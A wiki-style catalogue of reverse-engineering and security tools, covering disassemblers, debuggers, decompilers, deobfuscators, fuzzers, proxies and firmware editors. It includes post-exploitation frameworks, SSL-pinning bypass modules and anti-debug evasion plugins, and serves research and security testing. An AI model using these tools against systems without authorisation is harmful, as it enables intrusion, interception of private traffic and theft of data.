====Virtualization technology (host isolation) or sandboxes====

*[https://github.com/firecracker-microvm/firecracker Firecracker] - is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant container and function-based services that provide serverless operational models.

*[https://www.redhat.com/en/technologies/cloud-computing/openshift/virtualization Red Hat OpenShift Virtualization] - Red Hat® OpenShift® Virtualization, a feature of Red Hat OpenShift, allows IT teams to run virtual machines alongside containers on the same platform, simplifying management and improving time to production.

*[https://xenproject.org/ Xen Project] - The Xen Project focuses on revolutionizing virtualization by providing a versatile and powerful hypervisor that addresses the evolving needs of diverse industries.

*[https://github.com/sandboxie-plus/Sandboxie Sandboxie] - is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying local & mapped drives or the Windows registry.

*[https://github.com/kpcyrd/boxxy-rs boxxy-rs] - is a linkable sandbox explorer. "If you implement boundaries and nobody is around to push them, do they even exist?". Have you ever wondered how your sandbox looks like from the inside? Tempted to test if you can escape it, if only you had a shell to give it a try?

*[https://www.virtualbox.org/ Oracle VM VirtualBox] - is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 3.

*[https://www.vmware.com/ VMware] - is a virtualization and cloud computing software provider based in Palo Alto, Calif.

*[https://www.qemu.org/ QEMU] - A generic and open source machine emulator and virtualizer.

*[https://linux-kvm.org/page/Main_Page KVM (for Kernel-based Virtual Machine)] - is a full virtualization solution for Linux on x86 hardware containing virtualization extensions (Intel VT or AMD-V). It consists of a loadable kernel module, kvm.ko, that provides the core virtualization infrastructure and a processor specific module, kvm-intel.ko or kvm-amd.ko.

*[https://www.proxmox.com/en/proxmox-virtual-environment/overview Proxmox] - is a complete, open-source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage and networking functionality, on a single platform.
----

====Dynamic & Static Analysis (mostly '''unmanged''' binaries)====

=====Interactive Disassemblers ('''static analysis''')=====

*[https://binary.ninja/ Binary Ninja] - reverse-engineering platform that can disassemble a binary and display the disassembly in linear or graph views.

::Binary Ninja Scripts/Plugins/Extension
:::*[https://github.com/ergrelet/themida-unmutate-bn themida-unmutate-bn] - a Binary Ninja plugin to deobfuscate Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.
:::*[https://github.com/ergrelet/themida-spotter-bn themida-spotter-bn] - a Binary Ninja plugin to detect Themida, WinLicense and Code Virtualizer's obfuscated code locations.

*[https://www.nsa.gov/resources/everyone/ghidra/ Ghidra] - Ghidra is an open source software reverse engineering (SRE) framework developed by NSA's [https://www.nsa.gov/what-we-do/research/ Research] Directorate for NSA's [https://www.nsa.gov/what-we-do/cybersecurity/ cybersecurity mission].

::Ghidra Scripts/Plugins/Extension
:::*[https://github.com/AllsafeCyberSecurity/awesome-ghidra Scripts/Plugins/Extension] - A curated list of awesome Ghidra materials.
:::*[https://github.com/grayhatacademy/ghidra_scripts Arm & MIPS scripts] - ARM & MIPS ROP finder, Call Chain, Codatify, Fluorescence, Function Profiler, Leaf Blower, Local Cross Reference, and more.
:::*[https://github.com/DSecurity/efiSeek efiSeek] - is a tool that aids in identifying and analyzing EFI (Extensible Firmware Interface) binaries by locating key EFI structures and metadata within firmware images.
:::*Qt Framework
::::*[https://github.com/diommsantos/QtREAnalyzer/ QtREAnalyzer] - is a extension to reverse-engineer Qt binaries. Works only with Run-Time Type Information (RTTI) enabled & compiled with MSVC.
::::*[https://github.com/OSUSecLab/QtRE QtRE] - is a headless analyzer tailored for Qt binary analysis.

*[https://www.hex-rays.com/products/ida/ IDA] - The IDA Disassembler and Debugger is an interactive, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.

::IDA Scripts/Plugins/Extension
:::*[https://github.com/gdelugre/ida-arm-system-highlight IDA ARM] - This script will give you the list of ARM system instructions used in your IDA database. This is useful for locating specific low-level pieces of code (setting up the MMU, caches, fault handlers, etc.).
:::*[https://github.com/google/bindiff BinDiff] - is a Open Source comparison tool for binary files, that assists vulnerability researchers and engineers to quickly find differences and similarities in disassembled code.
:::*[https://www.keystone-engine.org/keypatch/ Keypatch] - A multi-architeture assembler for IDA. Keypatch allows you enter assembly instructions to directly patch the binary under analysis. Powered by Keystone engine.
:::*[https://github.com/onethawt/idastealth IDAStealth] - is a plugin which aims to hide the IDA debugger from most common anti-debugging techniques. The plugin is composed of two files, the plugin itself and a dll which is injected into the debugger as soon as the debugger attaches to the process.
:::*[https://github.com/iphelix/ida-sploiter ida-sploiter] - is a exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others.
:::*[https://github.com/danigargu/IDAtropy IDAtropy] -is a plugin for Hex-Ray's IDA Pro designed to generate charts of entropy and histograms using the power of idapython and matplotlib
:::*[https://github.com/grayhatacademy/ida/tree/master/plugins/localxrefs Localxrefs] - Finds references to any selected text from within the current function.
:::*[https://github.com/a1ext/labeless Labeless] - is a plugin system for dynamic, seamless and realtime synchronization between IDA Database and Olly. Labels, function names and global variables synchronization is supported. Olly and x64dbg are supported.
:::*[https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs Turbodiff] - is a binary diffing tool developed as an IDA plugin. It discovers and analyzes differences between the functions of two binaries.
::::*Oreans CV scripts
:::::*[[Media:Oreans anti debug blacklist identifier.zip]] - [Python script] Oreans - Anti-Debugger Blacklist Identifier; Tested on 2.3.0.0 - 2.4.6.0.
:::::*[[Media:Oreans macro entry identifier biased.zip]] - [Python script] Oreans - Macro Entry Identifier (Biased); Tested on 2.3.0.0 - 3.0.8.0.
:::::*[[Media:Oreans macro entry identifier reversal.zip]] - [Python script] Oreans - Macro Entry Identifier (Reversal); Tested on 2.3.0.0 - 3.0.8.0.
:::*[https://github.com/onethawt/idaplugins-list A list of IDA Plugins PART1 (click here for more)] - A large list/collection of plugins for IDA.
:::*[https://github.com/vmallet/ida-plugins A list of IDA Plugins PART2 (click here for more)] - A large list/collection of plugins for IDA.
:::*[https://github.com/fr0gger/awesome-ida-x64-olly-plugin A list of IDA Plugins PART3 (click here for more)] - A large list/collection of plugins for IDA.
::IDA LLM Plugins
:::*Local (quantized LLMs Q4/INT4)
::::*[https://github.com/atredispartners/aidapal aiDAPal] - is an IDA Pro plugin that uses a locally running LLM that has been fine-tuned for Hex-Rays pseudocode to assist with code analysis.
::::*[https://github.com/0xdea/oneiromancer oneiromancer] - is a reverse engineering assistant that uses a locally running LLM to aid with pseudo-code analysis.
:::*Cloud
::::*[https://github.com/JusticeRage/Gepetto Gepetto] - is a Python plugin which uses various large language models to provide meaning to functions decompiled by IDA Pro (≥ 7.4). It can leverage them to explain what a function does, and to automatically rename its variables.
::::*[https://github.com/Antelcat/ida_copilot ida_copilot] - is a ChatGPT plugin for IDA Pro, where the cutting-edge capabilities of OpenAI's GPT models meet the powerful disassembly and debugging features of IDA Pro.
::::*[https://github.com/ke0z/VulChatGPT VulChatGPT] - is an plugin for Hex-Rays decompiler which integrates with the OpenAI API (ChatGPT) to assist in vulnerability discovery during reverse-engineering.
::::*[https://github.com/RevEngAI/reai-ida RevEng.AI] - is a plugin by RevEng.AI that integrates with their AI-driven analysis platform to let you upload binaries, fetch semantic summaries, auto‑rename functions based on similar binaries, sync analyses, and even perform AI‑based decompilation.

*[https://codisec.com/veles/ Veles] - Open source tool for binary data analysis (No longer actively developed).

*[https://github.com/uxmal/reko Reko] - Reko is a binary decompiler for static analysis (ARM, x86-64, M68K, Aarch65, RISC-V and dotnet)

*[https://rada.re/ radare2] and [https://rizin.re/ Rizin] - radare2 and its fork Rizin are open source reverse engineering frameworks. Both are primarily used through a shell-like text UI, but also offer GUIs called [https://rada.re/n/iaito.html iaito] and [https://cutter.re/ Cutter] respectively.

*[https://github.com/rizinorg/cutter Cutter] - is a free and open-source reverse engineering platform powered by rizin. It aims at being an advanced and customizable reverse engineering platform while keeping the user experience in mind. Cutter is created by reverse engineers for reverse engineers.

*[https://github.com/joelpx/plasma Plasma] - Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.

*[https://github.com/wisk/medusa Medusa] - is a disassembler designed to be both modular and interactive. It runs on Windows and Linux, it should be the same on OSX.

*[https://github.com/capstone-engine/capstone Capstone] - is a disassembly/disassembler framework for ARM, ARM64 (ARMv8), BPF, Ethereum VM, M68K, M680X, Mips, MOS65XX, PPC, RISC-V(rv32G/rv64G), SH, Sparc, SystemZ, TMS320C64X, TriCore, Webassembly, XCore and X86.

=====Active Disassemblers or Debuggers ('''dynamic analysis''')=====

*[https://github.com/vivisect/vivisect Vivisect] - Vivisect binary analysis framework. Includes Disassembler, Debugger, Emulation and Symbolik analysis engines. Includes built-in Server and Shared-Workspace functionality. Runs interactive or headless, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X (Pure-Python, using ctypes to access underlying OS debug mechanism). Supports RevSync via plugin, allowing basic collaboration with Binja, Ghidra, and IDA. Criticisms (from a core dev): "Graph View could use some work, slower than Binja and IDA (due to Python), documentation like an OpenSource Project... but we keep working to make it better. PR's and suggestions welcome." Best installed via Pip: <code>python3 -m pip install vivisect</code>

*[https://www.immunityinc.com/products/debugger/ Immunity Debugger] - is a powerful new way to write exploits, analyze malware, and reverse engineer Windows binary files (python support)

*[https://www.hopperapp.com/ Hopper] - Hopper can use LLDB or GDB, which lets you debug and analyze the binary in a dynamic way (only for Mac and Linux hosts, not for mobile devices).

*[https://www.ollydbg.de/ OllyDbg] - is a powerful, user-friendly 32-bit Windows debugger focused on binary analysis, reverse engineering, and malware research, featuring dynamic code analysis and a rich plugin ecosystem.

::OllyDbg Scripts/Plugins/Mods
:::*[https://github.com/ThomasThelen/OllyDbg-Scripts OllyDbg-Scripts] - is a curated list containing many older x86 OllyDbg scripts.

*[https://x64dbg.com/ x64dbg] - Is a powerful Open Source Ollydbg replacement with a User Interface very similar to Ollydbg also x64dbg as the name states offers x64 support.

::x64dbg Plugins/Integrations/Templates
:::*[https://github.com/x64dbg/x64dbg/wiki/Plugins x64dbg's Wiki] - is a wiki of Integrations and Plugins of x64dbg debugger.
:::*[[Media:Oreans oep finder uni.zip]] - OEP Finder python script (Universal=works for "all" versions); Tested on 2.3.0.0, 2.3.5.10, 3.0.8.0.

*[https://github.com/mandiant/rvmi rVMI] - is a debugger on steroids. It leverages Virtual Machine Introspection (VMI) and memory forensics to provide full system analysis. This means that an analyst can inspect userspace processes, kernel drivers, and pre-boot environments in a single tool.

*[https://www.sourceware.org/gdb/ GDB] - the GNU Project debugger, allows you to see what is going on `inside' another program while it executes, or what another program was doing at the moment it crashed.

::GDB Plugins/Integrations/Templates
:::*[https://github.com/pwndbg/pwndbg pwndbg] - is a GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers.

*[https://github.com/eteran/edb-debugger edb] - is a cross platform AArch32/x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on AArch32, x86, and x86-64 as well as multiple OS's.

====Debugging and Profiling dynamic analysis (Linux)====

*[https://valgrind.org/ Valgrind] - is a GPL'd system for debugging and profiling Linux programs. With Valgrind's tool suite you can automatically detect many memory management and threading bugs, avoiding hours of frustrating bug-hunting, making your programs more stable.

*[https://libcsdbg.sourceforge.net/jTracer/ jTracer] - is a stack trace visualization utility for libcsdbg. In other words, it acts as a TCP/IP server for libcsdbg clients, that connect to it and transfer their trace data, either C++ exception stack traces or generic thread stack traces and whole process stack dumps.

*[https://github.com/koute/bytehound Bytehound] - is a memory profiler tool for Linux designed to help developers analyze memory usage and find leaks in their applications.

*[https://github.com/strace/strace strace] - is a diagnostic, debugging and instructional userspace utility for Linux.

*[https://github.com/rr-debugger/rr rr Record and Replay Framework] - is a lightweight tool for recording, replaying and debugging execution of applications (trees of processes and threads). Debugging extends gdb with very efficient reverse-execution, which in combination with standard gdb/x86 features like hardware data watchpoints, makes debugging much more fun.

*[https://github.com/lornix/fenris fenris] - is a program execution path analysis tool suitable for black-box code audits and algorithm analysis. It's useful for tracking down bugs and evaluating security subsystems.

====Debuggers / Disassemblers / Decompilers for '''managed''' binaries====

=====.NET (CLR)=====

*[https://github.com/dnSpyEx/dnSpy dnSpyEx (newly maintained repo & '''added features''')] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.
*[https://github.com/dnSpy/dnSpy dnSpy (archived repo)] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.
*[https://github.com/icedland/iced Iced] - Blazing fast and correct x86/x64 disassembler, assembler, decoder, encoder for Rust, .NET, Java, Python, Lua.
*[https://github.com/icsharpcode/ILSpy ILSpy] - NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&more) - cross-platform!
*[https://www.telerik.com/products/decompiler.aspx Telerik JustDecompile] - is a free .NET decompiler and assembly browser that makes high-quality .NET decompilation easy With an open source decompilation engine.

======.NET deobfuscators======

::*[https://github.com/ViRb3/de4dot-cex de4dot CEx] - is a deobfuscator based on de4dot with full support for vanilla ConfuserEx.
::*[https://github.com/de4dot/de4dot de4dot] - is a .NET deobfuscator and unpacker.
::*[https://github.com/NotPrab/.NET-Deobfuscator Lists of .NET deobfuscators and unpackers (Open Source)] - A curated list of open source deobfuscators and more.

======.NET memory dumpers======

::*[https://github.com/wwh1004/ExtremeDumper ExtremeDumper] - is a .NET Assembly Dumper (source code available).
::*[https://github.com/fremag/MemoScope.Net MemoScope.Net] - is a tool to analyze .Net process memory: it can dump an application's memory in a file and read it later. The dump file contains all data (objects) and threads (state, stack, call stack).
::*[https://github.com/0x410c/ClrDumper ClrDumper] - is a tool that can dump .NET assemblies and scripts from native clr loaders, managed assembly and vbs, jscript or powershell scripts.

======.NET tracers======

::*[http://www.reteam.org/board/showthread.php?t=939 dotNET Tracer 2.0 by Kurapika] - is a simple tool that has a similar functionality to RegMon or FileMon but it's designed to trace events in .NET assemblies in runtime. [[Media:KDT2.0.zip]] [https://www.virustotal.com/gui/file/d29afcc5115c28f9892f7a6d249423374ad77ac86f69b316665c347982975d02 VT1] [https://www.virustotal.com/gui/file/04cd51dbbc3d2b4fe4a721e4ad0c2f3012fe0f409dc902b430207ea25561ff8c VT2] (thermida packed), pw: recessim.com
::*[https://github.com/smourier/TraceSpy TraceSpy] - is a open source and free, alternative to the very popular SysInternals DebugView tool.

=====JAVA (JVM) Decompilers=====

:*[https://github.com/Col-E/Recaf Recaf] - Recaf is an open-source Java bytecode editor that simplifies the process of editing compiled Java applications.
:*[https://www.pnfsoftware.com/ JEB decompiler] - Decompile and debug Android dalvik, Intel x86, ARM, MIPS, RISC-V, S7 PLC, Java, WebAssembly & Ethereum Decompilers.

======JAVA (ART/APK)======
The tooling you need for Android application reverse engineering of the Java virtual machine bytecode. Traditional Java Virtual Machine (JVM) and Android Runtime (ART) that utilizes AOT compilation over JIT.

:*[https://github.com/skylot/jadx Jadx] - Dex to Java decompiler. Command-line and GUI tools for producing Java source code from Android Dex and apk files.
:*[https://github.com/honeynet/apkinspector/ APKinspector] - is a powerful GUI tool for analysts to analyze the Android applications.
:*[https://apktool.org/ Apktool] - A tool for reverse engineering Android apk files.
:*[https://github.com/androguard/androguard Androguard] - is a full python tool to play with Android files. DEX, ODEX; APK; Android's binary xml; Android resources; Disassemble DEX/ODEX bytecodes.
:*[https://github.com/Konloch/bytecode-viewer Bytecode viewer] - is a Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More)
:*[https://github.com/niranjan94/show-java ShowJava] - is an APK (android application), JAR & Dex decompiler for android.
:*[https://github.com/tp7309/TTDeDroid TTDeDroid] - is a tool for quickly decompiling apk/aar/dex/jar.
:*[https://github.com/JesusFreke/smali smali/baksmali] - is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax.

======RASP (Runtime Application Self-Protection) Android======
To effectively audit applications, testers often intentionally make their devices vulnerable to simplify testing. 
In response, application developers implement countermeasures such as detecting emulators, debuggers, and checking if the device is secure and not rooted. 
The current focus of this technology is on the vulnerabilities of Java and .NET platforms.
:*[https://arxiv.org/pdf/2312.17726 arXiv:2312.17726 (cs.CR)] - is a paper regarding Interactive Application Security Testing (IAST) and RASP Tools.
:*[https://github.com/securevale/android-rasp Android-RASP] - is a solution for protecting Android apps against being run on vulnerable devices.

======JAVA deobfuscators (mixed platforms)======
There is nothing more annoying than coroutines (ProGuard), c-flow, function virtualization, class and name renaming and junk code while decompiling code. Here are a few off the shelf deobfuscators.

:*[https://github.com/CalebFenton/simplify simplify] - Android virtual machine and generic deobfuscator.
:*[https://github.com/java-deobfuscator/deobfuscator deobfuscator] - is a project that aims to deobfuscate most commercially-available obfuscators for Java. [https://github.com/java-deobfuscator/deobfuscator-gui GUI version github]
:*[https://github.com/GraxCode/threadtear Threadtear] - is a multifunctional deobfuscation tool for java, ZKM and Stringer support, Android support is in development.
:*[https://github.com/narumii/Deobfuscator Another Deobfuscator] - Some deobfuscator for java. Supports superblaubeere27 / JObf / sb27, Paramorphism 2.1.2_9, Caesium, Monsey, Skid/qProtect, Scuti, CheatBreaker, Bozar, ...

======JAVA decompilers (platform independent)======
:*[https://github.com/fesh0r/fernflower Fernflower] - is a powerful open-source Java decompiler that reconstructs readable Java source code from compiled bytecode, widely used and integrated into IntelliJ IDEA.

====Debuggers / Disassemblers for '''unmanaged''' binaries====

=====AutoIt=====
AutoIt decompilers extract or anything else related to reverse engineering AutoIt binaries.
:*[https://github.com/JacobPimental/exe2aut exe2aut] - is a tool that converts executable (.exe) files into AutoIt script (.aut) source code, attempting to reverse-engineer compiled AutoIt programs.
:*[https://github.com/nazywam/AutoIt-Ripper AutoIt-Ripper] - is a short python script that allows for extraction of "compiled" AutoIt scripts from PE executables.

=====VB6=====
Early .NET applications compile native and p-code meaning there is not a easy way to decompile these like with newer .NET framework exectables.
:*[https://www.vb-decompiler.org/ VB Decompiler Pro] - is a commercial software tool that decompiles and analyzes programs written in Visual Basic 5.0/6.0 and also .NET for reverse engineering and code recovery purposes.

====Bytecode Decompilers====

=====React Native Hermes=====
If you plan on looking inside a compiled React Native Asset for doing a security audit, these tools come in handy.

:*[https://github.com/P1sec/hermes-dec hermes-dec] - A reverse engineering tool for decompiling and disassembling the React Native Hermes bytecode.
:*[https://github.com/Pilfer/hermes_rs hermes_rs] - Bytecode disassembler and assembler.
:*[https://github.com/bongtrop/hbctool hbctool] - Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode).

=====Python=====
To reverse or decompile binaries generated by IronPython, which compiles Python code into Common Intermediate Language (CIL) targeting the Common Language Infrastructure (CLI), you should use decompilation tools designed for managed assemblies rather than traditional Python bytecode tools.
:*[https://github.com/rocky/python-uncompyle6 uncompyle6] - is a native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.
:*[https://github.com/zrax/pycdc pycdc] - is a C++ python bytecode disassembler and decompiler.
:*[https://github.com/Cisco-Talos/pyrebox PyREBox] - is a Python scriptable Reverse Engineering sandbox by Cisco-Talos. It is based on QEMU, and its goal is to aid reverse engineering by providing dynamic analysis and debugging capabilities from a different perspective.
:*[https://github.com/snare/voltron Voltron] - is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host.

=====Lua=====
:*[https://github.com/scratchminer/unluac unlua] - is a decompiler that converts compiled Lua 5.1 bytecode files (.luac) back into readable Lua source code.

----

====Fuzzers====

*[https://github.com/google/honggfuzz Honggfuzz] - Security oriented software fuzzer. Supports evolutionary, feedback-driven fuzzing based on code coverage (SW and HW based).

*[https://llvm.org/docs/LibFuzzer.html LibFuzzer] - LibFuzzer is an in-process, coverage-guided, evolutionary fuzzing engine.

*[https://github.com/google/AFL '''(ARCHIVED)''' AFL (American fuzzy lop)] - is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary.

*[https://github.com/AFLplusplus/AFLplusplus AFL++ (AFLplusplus)] - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!

*[https://github.com/carolemieux/afl-rb FairFuzz] - is a AFL extension to increase code coverage by targeting rare branches. FairFuzz has a particular advantage on programs with highly nested structure (packet analyzers, xmllint, programs compiled with laf-inte, etc).

*[https://github.com/RUB-SysSec/redqueen RedQueen] - is a fast general purpose fuzzer for x86 binary applications. It can automatically overcome checksums and magic bytes without falling back to complex and fragile program analysis techniques, such as symbolic execution.

*[https://github.com/sslab-gatech/qsym '''(ARCHIVED)''' QSYM] - ia a Practical Concolic Execution Engine Tailored for Hybrid Fuzzing.

*[https://github.com/puppet-meteor/MOpt-AFL MOpt-AFL] - is a AFL-based fuzzer that utilizes a customized Particle Swarm Optimization (PSO) algorithm to find the optimal selection probability distribution of operators with respect to fuzzing effectiveness. More details can be found in the technical report. The installation of MOpt-AFL is the same as AFL's.

====PC platform exploration frameworks====

*[https://github.com/chipsec/chipsec Chipsec] - is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low level interfaces, and forensic capabilities.

*[https://github.com/rapid7/metasploit-framework Metasploit Framework] - is a Ruby-based Framework, modular penetration testing platform that enables you to write, test, and execute exploit code.

*[https://github.com/BC-SECURITY/Empire Empire] - is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.

*[https://github.com/Arachni/arachni Arachni] - is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

*[https://portswigger.net/burp Burp Suite] - Burp or Burp Suite is a set of tools used for penetration testing of web applications.

====Mobile exploration frameworks====

*[https://github.com/MobSF/Mobile-Security-Framework-MobSF MobSF] - Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.

*[https://frida.re/ Frida] - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.

*[https://github.com/sensepost/objection objection] - is a runtime mobile exploration toolkit, powered by Frida, built to help you assess the security posture of your mobile applications, without needing a jailbreak.

*[https://github.com/xtiankisutsa/MARA_Framework MARA] - is a Mobile Application RE and Analysis Framework. It is a toolkit that puts together commonly used mobile application RE and analysis tools to assist in testing mobile applications against the OWASP mobile security threats.

*[https://github.com/EntySec/SeaShell SeaShell] - is an iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information.

*[https://github.com/mingyuan-xia/AppAudit AppAudit] - is an efficient program analysis tool that detects data leaks in mobile applications. It can accurately find all leaks within seconds and ~200 MB memory.

*[https://github.com/canyie/pine Pine] - is a dynamic java method hook framework on ART runtime, which can intercept almost all java method calls in the current process.

*[https://github.com/LSPosed/LSPlant LSPlant] - is an Android ART hook library, providing Java method hook/unhook and inline deoptimization.

*[https://github.com/LSPosed/LSPosed LSposed] - is a Riru / Zygisk module trying to provide an ART hooking framework which delivers consistent APIs with the OG Xposed, leveraging LSPlant hooking framework.

::LSPosed Module Repository
:::*[https://github.com/Xposed-Modules-Repo Xposed Modules Repo] - New Xposed(LSPosed) Module Repository.

*[https://github.com/ElderDrivers/EdXposed Xposed Framework] - is a framework for mobile exploration hooking and modifying code on the fly. [https://binderfilter.github.io/xposed/ Inline API hooking example].

::Xposed modules
:::*[https://github.com/Fuzion24/JustTrustMe JustTrustMe] - Art framework hook to patch okHTTP and other common libs to fool the CERT chain in order for Mitmproxy to capture TLS traffic in cleartext.
:::*[https://github.com/sanfengAndroid/FakeXposed FakeXposed] - Hide xposed, root, file redirection, two-way shielding data detection.
:::*[https://github.com/ac-pm/SSLUnpinning_Xposed/ SSLUnpinning_Xposed] - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning)..

::Xposed Framework API Development Documentation
:::*[https://api.xposed.info/reference/packages.html Xposed API Reference] - Javadoc reference of the Xposed Framework API. It's meant for module developers who want to understand which classes and methods they can use.

====Network Inspection====

=====Promiscuous mode eavesdropping TCP/UDP=====

::*[https://github.com/mitmproxy/mitmproxy Mitmproxy] - is an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.

::*[https://gitlab.com/wireshark/wireshark Wireshark] - is a network traffic analyzer, or "sniffer", for Linux, macOS, *BSD and other Unix and Unix-like operating systems and for Windows.

::*[https://github.com/zaproxy/zaproxy Zed Attack Proxy (ZAP)] - is an Open Source & easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

::*[https://github.com/SensePost/Mallet Mallet] - is an intercepting proxy for arbitrary protocols.

::*[https://github.com/Warxim/petep PETEP (PEnetration TEsting Proxy)] - is an open-source Java application for traffic analysis & modification using TCP/UDP proxies. PETEP is a useful tool for performing penetration tests of applications with various application protocols.

=====HTTP(S) Debuggers / Web Debuggers=====

::*[https://portswigger.net/burp Burp Suite] - is a proxy tool which helps to view, interact, modify web requests. Test, find, and exploit vulnerabilities faster with a complete suite of security testing tools.

::*[https://www.httpdebugger.com/ HTTP Debugger Pro] - is a network traffic analyzer tool that captures, displays, and analyzes HTTP and HTTPS traffic between a web browser or application and the internet for debugging and testing purposes.

::*[https://github.com/httptoolkit HTTP Toolkit] - is a beautiful, cross-platform & open-source HTTP(S) debugging proxy, analyzer & client, with built-in support for modern tools from Docker to Android to GraphQL.

::*[https://github.com/jbittel/httpry httpry] - is a HTTP logging and information retrieval tool written in Perl and C.

::*[https://github.com/requestly/requestly Requestly] - Bring the power of Charles Proxy, Fiddler & Postman together with beautiful, modern UI & collaboration features.

::*[https://telerik-fiddler.s3.amazonaws.com/fiddler/FiddlerSetup.exe Fiddler] - is a Web Debugger is a serviceable web debugging proxy for logging all HTTP(S) traffic linking your computer and the internet, allowing for traffic inspection, breakpoint setting, and more.

=====Other Network Tools=====

::*[https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview tcpview] - is a tool that will enumerate all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions (Windows).

::*[https://www.nirsoft.net/utils/cports.html cports] - is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local Windows computer.

::*[https://www.netresec.com/?page=NetworkMinerSourceCode NetworkMiner] - is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files.

::*[https://linux.die.net/man/8/netstat netstat] - is a Linux CLI tool to print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.

----

====BIOS (basic input/output system) firmware modifying software====
Unified Extensible Firmware Interface (UEFI) & legacy computer BIOS (basic input/output system) firmware modifying software. 

=====UEFI=====
::*[https://github.com/LongSoft/UEFITool UEFITool / UEFIExtract / UEFIFind] - is a UEFI firmware image viewer and editor.
::*[https://github.com/LongSoft/IFRExtractor-RS IFRExtractor-RS] - is a Rust utility to extract UEFI IFR (Internal Form Representation) data found in a binary file into human-readable text.
::*[https://github.com/theopolis/uefi-firmware-parser uefi-firmware-parser] - is a cross-platform open source application written in Python. Very tinker-friendly. Can be used in scripts to automate firmware patching.
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.01_x64.exe AMIBCP_5.01_x64] - AMI BIOS Configuration Program (AMIBCP) is a powerful customization utility that enables OEMs/ODMs to customize the Aptio® ROM image without intervening on the source code. [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b VT link]
::*[https://github.com/tylernguyen/razer15-hackintosh/blob/master/tools/AMIBCP64/AMIBCP64.exe AMIBCP 5.01.0014 x64] [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b/details VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0023.exe AMIBCP_5.02.0023] [https://www.virustotal.com/gui/file/38f7c54098af1544ddba6324e6d1fea6d1462f422ba021f309ad4445dacd0467 VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0031.exe AMIBCP_5.02.0031] [https://www.virustotal.com/gui/file/c7ade67fe0e8f4c22f73ce3168ff6e718086f1eda83cce4c065b4fe49bd5ad99 VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP%205.02.0034.exe AMIBCP 5.02.0034] [https://www.virustotal.com/gui/file/7fe28fb8a7419c95fba428891e5b3914d9e2b365a5a8932da74db52a1c1dabd8 VT link]
::*[https://github.com/datasone/grub-mod-setup_var grub-mod-setup_var] - a modified grub allowing tweaking hidden BIOS settings. Does not work with newer (2012 & >>) InsydeH2o because of SMM protection or variable locking.
::*[https://github.com/JamesAmiTw/ru-uefi RU.EFI] - is a UEFI app that allows users to examine and modify UEFI variables within a system's BIOS while the system is running. It's essentially a tool for interacting with and altering firmware settings, and is often used for tasks like unlocking hidden BIOS settings or debugging firmware-related issues. Crashes on newer (2012 & >>) InsydeH2o upon loading from EFI shell possibly because of violating BIOS runtime security policies.

=====BIOS (legacy)=====
